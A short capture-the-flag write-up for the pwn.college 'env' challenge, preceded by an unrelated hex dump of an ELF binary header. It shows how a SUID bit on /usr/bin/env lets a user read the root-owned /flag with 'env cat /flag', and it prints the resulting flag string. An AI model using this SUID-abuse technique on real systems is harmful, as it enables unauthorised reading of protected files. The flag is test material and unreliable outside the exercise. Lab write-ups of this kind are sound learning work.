00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 03 00 3e 00 01 00 00 00 60 10 40 00 00 00 00 00 |..>.....`.@.....| 00000020 40 00 00 00 00 00 00 00 48 30 00 00 00 00 00 00 |@.......H0......| 00000030 00 00 00 00 40 00 38 00 09 00 40 00 1a 00 19 00 |....@.8...@.....| 00000040 06 00 00 00 04 00 00 00 40 00 00 00 00 00 00 00 |........@.......| 00000050 40 00 40 00 00 00 00 00 40 00 40 00 00 00 00 00 |@.@.....@.@.....| 00000060 f8 01 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 |................| 00000070 08 00 00 00 00 00 00 00 03 00 00 00 04 00 00 00 |................| 00000080 38 02 00 00 00 00 00 00 38 02 40 00 00 00 00 00 |8.......8.@.....| 00000090 38 02 40 00 00 00 00 00 1c 00 00 00 00 00 00 00 |8.@.............| 000000a0 1c 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................| 000000b0 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 |................| 000000c0 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 |..@.......@.....| 000000d0 e4 08 00 00 00 00 00 00 e4 08 00 00 00 00 00 00 |................| 000000e0 00 10 00 00 00 00 00 00 01 00 00 00 06 00 00 00 |................| 000000f0 e8 0d 00 00 00 00 00 00 e8 0d 60 00 00 00 00 00 |........`.@.....| 00000100 e8 0d 60 00 00 00 00 00 48 02 00 00 00 00 00 00 |..`.....H.......| 00000110 50 02 00 00 00 00 00 00 00 10 00 00 00 00 00 00 |P...............| 00000120 02 00 00 00 06 00 00 00 08 0e 00 00 00 00 00 00 |................| 00000130 08 0e 60 00 00 00 00 00 08 0e 60 00 00 00 00 00 |..`.......`.....| 00000140 f0 01 00 00 00 00 00 00 f0 01 00 00 00 00 00 00 |................| 00000150 08 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 |................| 00000160 54 02 00 00 00 00 00 00 54 02 40 00 00 00 00 00 |T.......T.@.....| 00000170 54 02 40 00 00 00 00 00 44 00 00 00 00 00 00 00 |T.@.....D.......| 00000180 44 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 |D...............| 00000190 51 e5 74 64 06 00 00 00 00 00 00 00 00 00 00 00 |Q.td............| 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001c0 08 00 00 00 00 00 00 00 52 e5 74 64 04 00 00 00 |........R.td....| 000001d0 e8 0d 00 00 00 00 00 00 e8 0d 60 00 00 00 00 00 |........`.@.....|

0xKAAAMMUUI

Challenge Name: env

Writeup from Program Misuse

Category: Program Misuse
Platform: pwn.college
Difficulty: Begineer Date: 2025-07-15
Author: Himanshu Parate

🧠 Summary:

The challenge abuses a SUID bit set on /usr/bin/env, allowing an unprivileged user to read the root-owned flag file at /flag.

🔍 Enumeration

ls -l /usr/bin/env

output:

-rwsr-xr-x 1 root root 47480 Sep  5  2019 /usr/bin/env

-The s in -rws indicates it’s a SUID binary. -env runs with root privileges.

🚀 Exploitation

The env command is used to:

Run a command in a modified or clean environment.
Set environment variables temporarily for that command.
Find executables in your $PATH in a portable way (e.g., #!/usr/bin/env python3 in scripts).

So we can simply cat the /flag using env:

env cat /flag

Output:

pwn.college{ETC1sCoTJ7pTOpUVmC6XlNknnz7.dZjNxwSM0IzMyEzW}